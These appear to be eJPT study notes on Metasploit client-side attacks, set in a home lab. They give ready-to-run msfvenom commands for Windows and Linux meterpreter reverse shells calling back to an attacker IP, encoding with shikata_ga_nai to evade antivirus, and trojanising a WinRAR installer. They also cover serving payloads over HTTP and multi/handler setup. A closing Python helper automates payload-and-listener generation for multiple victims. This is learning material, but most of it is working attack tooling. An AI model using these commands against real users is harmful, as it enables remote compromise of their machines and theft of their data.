
Client-Side Attacks

Client-Side Attacks with MSF

A client-side attack is a security breach that happens on the client side: the target is the user's machine, and the user is tricked into running something.

  • Social engineering techniques take advantage of human weaknesses
  • They require user interaction to open malicious documents or portable executables (PEs)
  • The payload is stored and executed on the client's system
  • Attackers have to pay attention to antivirus detection

Advanced modern antivirus solutions detect and block this type of payload very easily.

Msfvenom Payloads

msfvenom - a Metasploit standalone payload generator and encoder

  • e.g. generate a malicious meterpreter payload and transfer it to a client target; once executed it connects back to the payload handler and provides remote access
  • List available payloads

msfvenom --list payloads

  • When generating a payload the exact name of the payload must be specified
    • target operating system
    • target O.S. architecture (x64, x86 ...)
    • payload type
    • protocol used to connect back (depends on requirements)

e.g. of Staged payload

  • windows/x64/meterpreter/reverse_tcp
  • The file contains only a small stager; once run, it connects back and downloads the rest of the payload (the stage) from the handler. Stager and stage are separated by a "/" in the name.

e.g. of Non-Staged payload

  • windows/x64/meterpreter_reverse_https
  • The whole payload is in the file (larger, no second download), with stage and transport joined by "_". The handler's payload setting must use exactly the same name as the generated file.

  • Generate a Windows payload with msfvenom

32bit payload:

```bash
# LHOST = attacker IP address
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f exe > /home/kali/certs/ejpt/Windows_Payloads/payloadx86.exe
```

64bit payload:

```bash
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f exe > /home/kali/certs/ejpt/Windows_Payloads/payloadx64.exe
```

  • List the output formats available

```bash
msfvenom --list formats
```

```
Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp, aspx, aspx-exe, axis2, dll, ducky-script-psh, elf, elf-so, exe,
    exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho,
    msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection,
    python-reflection, vba, vba-exe, vba-psh, vbs, war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    base32, base64, bash, c, csharp, dw, dword, go, golang, hex, java,
    js_be, js_le, nim, nimlang, num, perl, pl, powershell, ps1, py, python,
    raw, rb, ruby, rust, rustlang, sh, vbapplication, vbscript
```

  • Generate a Linux payload with msfvenom

32bit payload:

```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f elf > /home/kali/certs/ejpt/Linux_Payloads/payloadx86
```

64bit payload:

```bash
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f elf > /home/kali/certs/ejpt/Linux_Payloads/payloadx64
```

  • 📌 Platform and architecture are auto selected if not specified, based on the selected payload

The transferring method onto the target system depends on the type of the social engineering technique.

  • e.g. A simple web server can be set up on the attacker system to serve the payload files and a handler to receive the connection back from the target system

```bash
cd /home/kali/certs/ejpt/Windows_Payloads
sudo python -m http.server 8080
```

  • To deal with a meterpreter payload, an appropriate listener is necessary to handle the reverse connection, the multi/handler Metasploit module in this case

```
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run
```

  • Download the payload on the Windows 2008 system (in this case my home lab VM) from this link
    • http://192.168.31.128:8080
    • Run the payloadx86.exe payload on the target
  • The meterpreter session on the attacker machine should be opened

The same flow works with the linux/x86/meterpreter/reverse_tcp Linux payload executed on the Kali VM, with the handler's payload set to linux/x86/meterpreter/reverse_tcp so that it matches the generated file.

Encoding Payloads

Signature-based antivirus solutions detect malicious files or executables by matching known byte patterns. Older AV solutions could be evaded by encoding the payload so that the known pattern no longer appears on disk.

  • This kind of attack vector is outdated and hardly used today.
  • It may still work on legacy systems such as Windows 7 or older.

🗒️ Payload Encoding involves changing the payload shellcode with the aim of changing the payload signature.

🗒️ Shellcode is the code typically used as a payload for exploitation; it provides a remote command shell on the target system.

  • List the available encoders

```bash
msfvenom --list encoders
```

  • The most commonly used encoders are cmd/powershell_base64 and x86/shikata_ga_nai (the latter only applies to x86 payloads)

Windows Payload

  • Generate a Win x86 payload and encode it with shikata_ga_nai:

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe
```

  • The encoder can be applied several times by increasing the number of iterations with the -i option.
  • Each pass re-encodes the output of the previous one, so the bytes on disk differ from a single-pass encode. Against an old, purely signature-based scanner this raises the chance of evasion; it does not help against engines that emulate the decoder stub and scan what it unpacks.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe

Linux Payload

```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > /home/kali/certs/ejpt/Linux_Payloads/encodedx86
```

  • Test each of the above generated payloads, like before

```bash
cd /home/kali/certs/ejpt/Windows_Payloads
sudo python -m http.server 8080
```

```
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run
```

📌 A modern antivirus detects and blocks the encoded payload as soon as the download starts.

Injecting Payloads into PEs

🗒️ Windows Portable Executable (PE) is a file format for executables, object code, DLLs and others, used in 32-bit and 64-bit Windows O.S.

  • Download a portable executable, e.g. WinRAR
  • Payloads can be injected into PEs with msfvenom using the -x option (the PE to use as a template) and optionally -k (try to keep the template's original behaviour by running the payload in a new thread)

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -i 10 -f exe -x winrar-x32-621.exe > /home/kali/certs/ejpt/Windows_Payloads/winrar.exe
```

Serve the file and start the handler as before (the handler configuration does not change, because the injected payload is the same):

```bash
cd /home/kali/certs/ejpt/Windows_Payloads
sudo python -m http.server 8080
```

```
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run
```

  • Transfer the winrar.exe file to the target O.S. and run it.
  • Without -k the file's description (icon, version information) is kept, but not its functionality: the injected payload runs instead of WinRAR. With -k msfvenom tries to preserve the template's behaviour, which works only with some templates.

  • Proceed with the Post Exploitation module to migrate the process into another one, in the meterpreter session

run post/windows/manage/migrate

Automation with Resource Scripts

Repetitive tasks and commands can be automated using MSF resource scripts (similar to batch scripts: one msfconsole command per line, executed in order).

  • Almost every MSF command can be automated.

```bash
ls -al /usr/share/metasploit-framework/scripts/resource
```

e.g. 1

  • Automate the process of setting up a handler for the generated payloads, by creating a new handler.rc file

```bash
nano handler.rc
```

```
# Insert the following lines,
# specifying the commands sequentially

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run

# Save it and exit
```

  • Load and run the resource script in msfconsole

```bash
msfconsole -q -r handler.rc
```

e.g. 2

```bash
nano portscan.rc
```

```
# Insert the following lines,
# specifying the commands sequentially

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.31.131
run

# Save it and exit
```

```bash
msfconsole -q -r portscan.rc
```

e.g. 3

```bash
nano db_status.rc
```

```
db_status
workspace
workspace -a TEST
```

```bash
msfconsole -q -r db_status.rc
```

  • 📌 Load up a resource script from within the msfconsole with the resource command

resource /home/kali/certs/ejpt/resource_scripts/handler.rc

  • The commands typed in the current msfconsole session can be exported into a new resource script with makerc

makerc /home/kali/certs/ejpt/resource_scripts/portscan2.rc
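The two steps above that most often go wrong in practice are the payload generation and the matching handler: a session never arrives when the handler's payload, LHOST or LPORT differ from what was baked into the binary, or when an x86 encoder is requested for an x64 payload. The following script is an added example for these notes (it is not Metasploit code) that builds the msfvenom argument list and the corresponding handler.rc from one set of parameters, so both always agree. The function names (parse_payload, valid_endpoint, encoder_matches_arch, build_msfvenom_cmd, build_handler_rc, build_job) and the output paths are assumptions of this example; the msfvenom flags (-p, -f, -e, -i, -x, -k, -o) and the multi/handler options it emits are real ones. It only builds the command and the script text; it does not execute msfvenom.

```python
"""Build an msfvenom command line and the matching multi/handler resource
script from one set of parameters (added example, not Metasploit code)."""
import ipaddress
import shlex

# Output format per target platform, from `msfvenom --list formats`.
PLATFORM_FORMATS = {"windows": "exe", "linux": "elf"}


def parse_payload(payload: str) -> dict:
    """Split a Metasploit payload name into platform, arch and staging.

    Naming convention: a staged payload separates stage and stager with '/'
    (meterpreter/reverse_tcp), a stageless one joins them with '_'
    (meterpreter_reverse_https), so the last path element of a staged name
    is just the transport (reverse_tcp, bind_tcp, reverse_https, ...).
    """
    parts = payload.split("/")
    if len(parts) < 2 or parts[0] not in PLATFORM_FORMATS:
        raise ValueError(f"unsupported or malformed payload name: {payload}")
    # windows/meterpreter/... carries no explicit arch element and is x86.
    arch = parts[1] if parts[1] in ("x86", "x64") else "x86"
    staged = parts[-1].startswith(("reverse_", "bind_"))
    return {"platform": parts[0], "arch": arch, "staged": staged}


def valid_endpoint(lhost: str, lport: int) -> bool:
    """LHOST must be an IP literal and LPORT a usable TCP port."""
    try:
        ipaddress.ip_address(lhost)
    except ValueError:
        return False
    return 1 <= lport <= 65535


def encoder_matches_arch(encoder: str, payload: str) -> bool:
    """x86/* encoders (shikata_ga_nai) cannot encode an x64 payload;
    msfvenom refuses that combination at generation time.  Encoders
    that are not arch-specific (cmd/*, generic/*) are always accepted."""
    enc_arch = encoder.split("/")[0]
    if enc_arch not in ("x86", "x64"):
        return True
    return enc_arch == parse_payload(payload)["arch"]


def build_msfvenom_cmd(payload, lhost, lport, out_path,
                       encoder=None, iterations=1, template=None, keep=False):
    """Return the msfvenom argv for one payload; raises on inconsistent input."""
    if not valid_endpoint(lhost, lport):
        raise ValueError(f"bad LHOST/LPORT: {lhost}:{lport}")
    info = parse_payload(payload)
    cmd = ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
           "-f", PLATFORM_FORMATS[info["platform"]]]
    if encoder:
        if not encoder_matches_arch(encoder, payload):
            raise ValueError(f"encoder {encoder} does not fit an {info['arch']} payload")
        cmd += ["-e", encoder]
        if iterations > 1:
            cmd += ["-i", str(iterations)]   # re-encode the output N times
    if template:
        cmd += ["-x", template]              # inject into an existing PE
        if keep:
            cmd.append("-k")                 # try to keep the template's behaviour
    cmd += ["-o", out_path]                  # same as `> out_path` in the notes
    return cmd


def build_handler_rc(payload, lhost, lport, exit_on_session=False):
    """multi/handler resource script whose options mirror the payload.

    `set ExitOnSession false` plus `run -j` keeps the handler listening as a
    background job, so several victims (or a retry) can connect to it.
    """
    if not valid_endpoint(lhost, lport):
        raise ValueError(f"bad LHOST/LPORT: {lhost}:{lport}")
    lines = ["use exploit/multi/handler", f"set payload {payload}",
             f"set LHOST {lhost}", f"set LPORT {lport}"]
    if exit_on_session:
        lines.append("run")
    else:
        lines += ["set ExitOnSession false", "run -j"]
    return "\n".join(lines) + "\n"


def build_job(payload, lhost, lport, out_path, **kw):
    """Shell-ready msfvenom line plus the handler.rc text, built as one pair."""
    argv = build_msfvenom_cmd(payload, lhost, lport, out_path, **kw)
    return {"msfvenom": shlex.join(argv),
            "handler_rc": build_handler_rc(payload, lhost, lport)}


if __name__ == "__main__":
    # Lab values from the notes; the output path is a hypothetical example.
    job = build_job("windows/meterpreter/reverse_tcp", "192.168.31.128", 1234,
                    "Windows_Payloads/encodedx86.exe",
                    encoder="x86/shikata_ga_nai", iterations=10)
    print(job["msfvenom"])
    print(job["handler_rc"])
```

Run it and paste the printed msfvenom line into a shell; write the printed resource script to handler.rc and start it with `msfconsole -q -r handler.rc`. Because both come from the same parameters, the payload name, LHOST and LPORT in the handler cannot drift from the binary, and a mismatched encoder is rejected before msfvenom is even invoked.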